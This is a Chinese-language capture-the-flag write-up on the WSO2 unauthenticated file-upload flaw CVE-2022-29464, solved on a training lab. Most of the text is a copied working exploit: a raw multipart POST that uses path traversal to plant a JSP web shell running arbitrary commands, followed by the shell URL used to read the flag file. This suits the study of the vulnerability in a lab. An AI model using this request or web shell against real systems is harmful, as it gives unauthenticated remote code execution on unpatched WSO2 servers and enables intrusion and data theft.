上传漏洞（CVE-2022-29464）

靶场介绍

SO2文件上传漏洞（CVE-2022-29464）是Orange Tsai发现的WSO2上的严重漏洞。该漏洞是一种未经身份验证的无限制任意文件上传，允许未经身份验证的攻击者通过上传恶意JSP文件在WSO2服务器上获得RCE

漏洞分析

提示存在未授权任意登录，就是不需要登录可以任意上传文件

界面显示

 没有思路

 搜大神的EXP

POST /fileupload/toolsAny HTTP/1.1
Host: eci-2ze10vmvzbwvlvo5hzjk.cloudeci1.ichunqiu.com:9443 #host需要修改
Accept: */*
Accept-Encoding: gzip, deflate
Content-Length: 900
Content-Type: multipart/form-data; boundary=4ef9f369a86bfaadf5ec3177278d49c0
User-Agent: python-requests/2.22.0


--4ef9f369a86bfaadf5ec3177278d49c0
Content-Disposition: form-data; name="../../../../repository/deployment/server/webapps/authenticationendpoint/testshell.jsp"; filename="../../../../repository/deployment/server/webapps/authenticationendpoint/testshell.jsp"


    
    

<%@ page import="java.io.*" %>
    <%
    String cmd = request.getParameter("cmd");
    String output = "";
    if(cmd != null) {
        String s = null;
        try {
            Process p = Runtime.getRuntime().exec(cmd,null,null);
            BufferedReader sI = new BufferedReader(new
InputStreamReader(p.getInputStream()));
            while((s = sI.readLine()) != null) { output += s+"
"; }
        }  catch(IOException e) {   e.printStackTrace();   }
    }
%>
        <%=output %>
--4ef9f369a86bfaadf5ec3177278d49c0--

 bp进行重放

 

 ../../../../repository/deployment/server/webapps/authenticationendpoint/testshell.jsp

解释

原路径向上跳转4次那么现在的路径就是

authenticationendpoint/testshell.jsp

cmd=cat+%2Fflag​ 

解释

cmd=cat+%2Fflag 是针对 Unix/Linux 系统的一个命令。具体来说：

cat 是一个用于连接文件并打印它们内容的命令。
%2F 是 URL 编码后的斜杠 /。
flag 可能是一个文件名或路径。

 访问地址

https://eci-2ze10vmvzbwvlvo5hzjk.cloudeci1.ichunqiu.com:9443/authenticationendpoint/testshell.jsp?cmd=cat+%2Fflag

 flag{d76e7403-4ac6-46d0-a15b-017c07ca56ee}

 分析：还是没有思路